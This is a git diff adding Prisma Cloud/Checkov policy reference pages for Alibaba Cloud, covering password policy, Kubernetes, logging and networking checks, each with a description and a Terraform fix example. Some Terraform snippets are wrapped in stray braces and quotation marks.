true + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc new file mode 100644 index 000000000..02abe52b8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc @@ -0,0 +1,88 @@ +== Alibaba Cloud RAM password policy does not have a minimum of 14 characters + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud 
Policy ID +| cf20eb0b-ce41-486f-a179-8d2a3cb0378d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py[CKV_ALI_13] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Requiring passwords to include a minimum of 14 characters is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a minimum of 14 characters for Alibaba Cloud RAM accounts. This policy identifies Alibaba Cloud accounts that do not have a minimum of 14 characters in their password policy. +As a security best practice, configure a strong password policy for secure access to the Alibaba Cloud console. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Password Length' field, enter 14 as the minimum number of characters for password complexity. + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* + +To require a minimum password length of 14 characters in the RAM account password policy, add the following code to your Terraform file during buildtime.
+ + + + +[source,go] +---- +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = true + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/alibaba-kubernetes-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/alibaba-kubernetes-policies.adoc new file mode 100644 index 000000000..a697fe74a --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/alibaba-kubernetes-policies.adoc @@ -0,0 +1,19 @@ +== Alibaba Kubernetes Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc[Alibaba Cloud Kubernetes does not install plugin Terway or Flannel to support standard policies] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py[CKV_ALI_26] +|LOW + + +|xref:ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc[Alibaba Cloud Kubernetes node pools are not set to auto repair] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py[CKV_ALI_31] +|LOW + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc new file mode 100644 index 000000000..aa56403b3 --- /dev/null +++
b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc @@ -0,0 +1,88 @@ +== Alibaba Cloud Kubernetes does not install plugin Terway or Flannel to support standard policies + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b1622f63-3d01-4550-9d35-6946c08f36e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py[CKV_ALI_26] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Terway and Flannel are network plugins that enable seamless connectivity and communication between pods within a Kubernetes cluster. Installing the Terway or Flannel plugins on an Alibaba Cloud Kubernetes cluster can ensure adherence to standard network policies for routing and communication between pods. + +=== Fix - Buildtime + + +*Terraform* + +To install Terway or Flannel plugins on an Alibaba Cloud Kubernetes cluster, add the following code to your Terraform file during buildtime. 
+ + + +[source,go] +---- +{ + "resource "alicloud_cs_kubernetes" "pass" { + worker_number = 4 + worker_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + worker_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + + addons { + config = "" + name = "terway-eniip" + } + + + pod_vswitch_ids = ["vsw-id4"] +} + + +# array of addons +resource "alicloud_cs_kubernetes" "pass2" { + worker_number = 4 + worker_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_vswitch_ids = ["vsw-id1", "vsw-id1", "vsw-id3"] + master_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + worker_instance_types = ["ecs.n4.small", "ecs.sn1ne.xlarge", "ecs.n4.xlarge"] + + addons { + config = "" + name = "flannel" + } + + + addons { + name = "csi-plugin" + config = "" + } + + + pod_cidr = "10.0.1.0/16" +} + +", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc new file mode 100644 index 000000000..cf5d8d3c8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc @@ -0,0 +1,68 @@ +== Alibaba Cloud Kubernetes node pools are not set to auto repair + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7ad299d9-0dcb-41ce-9f66-0a30c5700b13 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py[CKV_ALI_31] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By enabling auto repair for 
Alibaba Cloud Kubernetes node pools, you can help ensure that your node pool is highly available and can automatically recover from failures or disruptions. +If a node in the pool fails or becomes unavailable, auto repair can automatically replace the node to restore full functionality to the pool. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_cs_kubernetes_node_pool" "pass" { + name = var.name + cluster_id = alicloud_cs_managed_kubernetes.default.0.id + vswitch_ids = [alicloud_vswitch.default.id] + instance_types = [data.alicloud_instance_types.default.instance_types.0.id] + + system_disk_category = "cloud_efficiency" + system_disk_size = 40 + key_name = alicloud_key_pair.default.key_name + + # comment out node_count and specify a new field desired_size + # node_count = 1 + + desired_size = 1 + + management { + auto_repair = true + auto_upgrade = false #default + surge = 1 + max_unavailable = 1 + } + +}", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-launch-template-data-disks-are-encrypted.adoc b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-launch-template-data-disks-are-encrypted.adoc new file mode 100644 index 000000000..c9a8fe970 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/ensure-alibaba-cloud-launch-template-data-disks-are-encrypted.adoc @@ -0,0 +1,114 @@ +== Alibaba Cloud launch template data disks are not encrypted + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5dea0e04-6728-4a04-a8e4-1dbbff5ec28b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py[CKV_ALI_32] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +As a best practice enable encryption for 
your Alibaba Cloud launch template data disks to improve data security without making changes to your business or applications. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_ecs_launch_template" "pass" { + launch_template_name = "tf_test_name" + description = "Test For Terraform" + image_id = "m-bp1i3ucxxxxx" + host_name = "host_name" + instance_charge_type = "PrePaid" + instance_name = "instance_name" + instance_type = "ecs.instance_type" + internet_charge_type = "PayByBandwidth" + internet_max_bandwidth_in = "5" + internet_max_bandwidth_out = "0" + io_optimized = "optimized" + key_pair_name = "key_pair_name" + ram_role_name = "ram_role_name" + network_type = "vpc" + security_enhancement_strategy = "Active" + spot_price_limit = "5" + spot_strategy = "SpotWithPriceLimit" + security_group_ids = ["sg-zkdfjaxxxxxx"] + system_disk { + category = "cloud_ssd" + description = "Test For Terraform" + name = "tf_test_name" + size = "40" + delete_with_instance = "false" + } + + + resource_group_id = "rg-zkdfjaxxxxxx" + user_data = "xxxxxxx" + vswitch_id = "vw-zwxscaxxxxxx" + vpc_id = "vpc-asdfnbgxxxxxxx" + zone_id = "cn-hangzhou-i" + + template_tags = { + Create = "Terraform" + For = "Test" + } + + + network_interfaces { + name = "eth0" + description = "hello1" + primary_ip = "10.0.0.2" + security_group_id = "sg-asdfnbgxxxxxxx" + vswitch_id = "vw-zkdfjaxxxxxx" + } + + + data_disks { + name = "disk1" + description = "test1" + delete_with_instance = "true" + category = "cloud" + encrypted = true + performance_level = "PL0" + size = "20" + } + + + data_disks { + name = "disk2" + description = "test2" + delete_with_instance = "true" + category = "cloud" + encrypted = true + performance_level = "PL0" + size = "20" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/alibaba-logging-policies.adoc 
b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/alibaba-logging-policies.adoc new file mode 100644 index 000000000..b61938d66 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/alibaba-logging-policies.adoc @@ -0,0 +1,34 @@ +== Alibaba Logging Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc[Alibaba Cloud Action Trail Logging is not enabled for all events] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py[CKV_ALI_5] +|MEDIUM + + +|xref:ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc[Alibaba Cloud Action Trail Logging is not enabled for all regions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py[CKV_ALI_4] +|MEDIUM + + +|xref:ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc[Alibaba Cloud OSS bucket has access logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py[CKV_ALI_12] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc[Alibaba Cloud RDS Instance SQL Collector Retention Period is less than 180] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSRetention.py[CKV_ALI_25] +|LOW + + +|xref:ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc[Alibaba Cloud Transparent Data Encryption is disabled on instance] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py[CKV_ALI_22] +|LOW + + +|=== + diff --git 
a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc new file mode 100644 index 000000000..f157252c3 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc @@ -0,0 +1,55 @@ +== Alibaba Cloud Action Trail Logging is not enabled for all events + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e0fe6e89-6e05-42c9-b613-54056934ae90 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py[CKV_ALI_5] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Enable ActionTrail log service for all events to track and monitor all activity in your Alibaba Cloud account, including all API calls and account activity. This logging service can help to identify potential security issues or unauthorized access, and can also be useful for auditing purposes. + +=== Fix - Buildtime + +To enable Alibaba Cloud ActionTrail Log Services, add the following code to your Terraform file during buildtime. 
+ +*Terraform* + + + + +[source,go] +---- +resource "alicloud_actiontrail_trail" "pass" { + trail_name = "action-trail" + oss_write_role_arn = "acs:ram::1182725xxxxxxxxxxx" + oss_bucket_name = "bucket_name" + event_rw = "All" + trail_region = "All" +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc new file mode 100644 index 000000000..beb0edaf8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc @@ -0,0 +1,57 @@ +== Alibaba Cloud Action Trail Logging is not enabled for all regions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 86797fca-4af1-46af-aa21-47d63236af2f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py[CKV_ALI_4] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By enabling Action Trail logging for all regions, you can track and monitor all activity in your Alibaba Cloud account, including the source IP address, the user or service that made the request, and the response status, regardless of where the activity occurs. +This can help to identify potential security issues or unauthorized access, and can also be useful for auditing purposes. + +=== Fix - Buildtime + + +*Terraform* + +To enable Cloud ActionTrail Logging Services for all regions, add the following code to your Terraform file during buildtime.
+ + + + +[source,go] +---- +resource "alicloud_actiontrail_trail" "pass" { + trail_name = "action-trail" + oss_write_role_arn = "acs:ram::1182725xxxxxxxxxxx" + oss_bucket_name = "bucket_name" + event_rw = "All" + trail_region = "All" +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc new file mode 100644 index 000000000..c15cbb8ab --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc @@ -0,0 +1,60 @@ +== Alibaba Cloud OSS bucket has access logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| da426a37-d689-4d72-8362-7596f8576a0f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py[CKV_ALI_12] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Enabling 'Access Logging' for an Alibaba Cloud OSS bucket allows you to record information about each request made to the bucket, including the request type, the source IP address, the object accessed, and the response status. This feature is beneficial for tracking and monitoring access to the bucket, identifying potential security risks or unauthorized access, and enhancing overall security and management of the bucket. In addition, access logging serves as a useful tool for auditing purposes, as it provides a comprehensive record of all requests made to the bucket. + + + +=== Fix - Buildtime + + +*Terraform* + +To enable 'Access Logging' for an Alibaba Cloud OSS bucket, add the following code to your Terraform file during buildtime.
+ + + + +[source,go] +---- +resource "alicloud_oss_bucket" "pass" { + bucket = "bucket-170309-logging" + + logging { + target_bucket = alicloud_oss_bucket.bucket-target.id + target_prefix = "log/" + } + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc new file mode 100644 index 000000000..85a11c06d --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc @@ -0,0 +1,68 @@ +== Alibaba Cloud RDS Instance SQL Collector Retention Period is less than 180 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 466bb5f2-164f-40be-a59d-33c71d435be8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSRetention.py[CKV_ALI_25] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +SQL Collector is a feature of Alibaba Cloud RDS that allows you to collect and analyze SQL performance data for your instance. The SQL Collector Retention Period determines the length of time that SQL performance data is retained in the RDS instance. To maintain a longer history of SQL performance data, which is useful for troubleshooting and performance optimization, set the SQL Collector Retention Period to a value greater than 180 (180 days). + +=== Fix - Buildtime + + +*Terraform* + +To modify the SQL Collector Retention Period, add the following code to your Terraform file during buildtime.
+ + + +[source,go] +---- +resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.t1.small" + instance_storage = "10" + sql_collector_status = "Enabled" + sql_collector_config_value = 180 + parameters = [{ + name = "innodb_large_prefix" + value = "ON" + }, { + + name = "connect_timeout" + value = "50" + }, { + + name = "log_connections" + value = "ON" + }] + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc new file mode 100644 index 000000000..7eb405adb --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-logging-policies/ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc @@ -0,0 +1,64 @@ +== Alibaba Cloud Transparent Data Encryption is disabled on instance + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 68c3dec0-01bc-4231-9a42-19dfbd172dcb + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py[CKV_ALI_22] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Alibaba Cloud Transparent Data Encryption (TDE) is a security feature that encrypts data at the storage level, which means that data is encrypted while it is written to the disk and decrypted when it is read. Activating TDE on an instance helps to protect the data stored on the instance from unauthorized access or exposure. +TDE also helps to meet compliance requirements that mandate data to be encrypted at rest. + +=== Fix - Buildtime + + +*Terraform* + +To enable TDE, add the following code to your Terraform file during buildtime.
+ + + +[source,go] +---- +resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.t1.small" + instance_storage = "10" + tde_status = "Enabled" + parameters = [{ + name = "innodb_large_prefix" + value = "ON" + }, { + + name = "connect_timeout" + value = "50" + }] + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/alibaba-networking-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/alibaba-networking-policies.adoc new file mode 100644 index 000000000..f7a49e2cc --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/alibaba-networking-policies.adoc @@ -0,0 +1,54 @@ +== Alibaba Networking Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc[Alibaba cloud ALB ACL does not restrict public access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py[CKV_ALI_29] +|LOW + + +|xref:ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc[Alibaba Cloud API Gateway API Protocol does not use HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py[CKV_ALI_21] +|LOW + + +|xref:ensure-alibaba-cloud-cypher-policy-is-secured.adoc[Alibaba Cloud Cypher Policy is not secured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py[CKV_ALI_33] +|LOW + + +|xref:ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc[Alibaba Cloud MongoDB instance is public] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py[CKV_ALI_43] +|LOW + + +|xref:ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc[Alibaba Cloud Mongodb instance
does not use SSL] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py[CKV_ALI_42] +|LOW + + +|xref:ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc[Alibaba Cloud MongoDB is not deployed inside a VPC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py[CKV_ALI_41] +|LOW + + +|xref:ensure-alibaba-cloud-rds-instance-uses-ssl.adoc[Alibaba Cloud RDS instance does not use SSL] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py[CKV_ALI_20] +|LOW + + +|xref:ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc[Alibaba Cloud Security group allow internet traffic to SSH port (22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py[CKV_ALI_2] +|HIGH + + +|xref:ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc[Alibaba Cloud Security group allow internet traffic to RDP port (3389)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py[CKV_ALI_3] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc new file mode 100644 index 000000000..dc594a02e --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc @@ -0,0 +1,48 @@ +== Alibaba cloud ALB ACL does not restrict public access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 989dceb7-e144-49cc-bc0f-cbf5f3ddd752 + +|Checkov 
Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py[CKV_ALI_29] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Alibaba Cloud ALB ACL refers to the Access Control List feature of the Alibaba Cloud Server Load Balancer (SLB) product called Application Load Balancer (ALB). Through an ALB ACL, you can prevent public access to your backend servers by configuring various settings such as IP addresses, domain names, HTTP methods, or HTTP header fields. + +=== Fix - Buildtime + +*Terraform* + +To restrict public access to your servers through an ALB ACL, add the following code to your Terraform file during buildtime. + + +[source,go] +---- +resource "alicloud_alb_acl_entry_attachment" "phew" { + acl_id = alicloud_alb_acl.fail.id + entry = "10.0.0.0/16" + description = var.name +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc new file mode 100644 index 000000000..6675302b0 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc @@ -0,0 +1,92 @@ +== Alibaba Cloud API Gateway API Protocol does not use HTTPS + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2b6fc74-b931-4679-a6ca-f6ccced850c6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py[CKV_ALI_21] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +To prevent unauthorized access or tampering with data being transferred, use a secure Gateway API protocol such as HTTPS, which
encrypts communication between clients and servers. This helps to mitigate the risk of potential security risks such as man-in-the-middle attacks, in which an attacker intercepts and modifies the communication between the API and its clients. + + +=== Fix - Buildtime + + +*Terraform* + +To configure HTTPS as the Alibaba Cloud API Gateway API protocol, add the following code to your Terraform file during buildtime. + + + + +[source,go] +---- +{ + " +resource "alicloud_api_gateway_api" "pass" { + name = alicloud_api_gateway_group.apiGroup.name + group_id = alicloud_api_gateway_group.apiGroup.id + description = "your description" + auth_type = "APP" + force_nonce_check = false + + request_config { + protocol = "HTTPS" + method = "GET" + path = "/test/path1" + mode = "MAPPING" + } + + + service_type = "HTTP" + + http_service_config { + address = "https://apigateway-backend.alicloudapi.com:8080" + method = "GET" + path = "/web/cloudapi" + timeout = 12 + aone_name = "cloudapi-openapi" + } + + + request_parameters { + name = "aaa" + type = "STRING" + required = "OPTIONAL" + in = "QUERY" + in_service = "QUERY" + name_service = "testparams" + } + + + stage_names = [ + "RELEASE", + "TEST", + ] +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-cypher-policy-is-secured.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-cypher-policy-is-secured.adoc new file mode 100644 index 000000000..94a188a80 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-cypher-policy-is-secured.adoc @@ -0,0 +1,50 @@ +== Alibaba Cloud Cypher Policy is not secured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a451b6a9-79fe-49bf-b5cb-2e007d2fa683 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py[CKV_ALI_33] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of the TLS protocol (TLS 1.2) as part of the Alibaba Cloud Cypher policy configuration. + +=== Fix - Buildtime + +*Terraform* + +To enable support for the TLS 1.2 protocol in your Alibaba Cloud Cypher policy, add the following code to your Terraform file during buildtime. + + +[source,go] +---- +resource "alicloud_slb_tls_cipher_policy" "pass" { + tls_cipher_policy_name = "itsfine" + tls_versions = ["TLSv1.2"] + ciphers = ["AES256-SHA","AES256-SHA256", "AES128-GCM-SHA256"] +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc new file mode 100644 index 000000000..e6326c009 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc @@ -0,0 +1,66 @@ +== Alibaba Cloud MongoDB instance is public + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b355c876-4d77-405b-b0f6-0aa38c70fa40 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py[CKV_ALI_43] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description +If an Alibaba Cloud MongoDB instance is configured to be publicly accessible, it can be accessed by
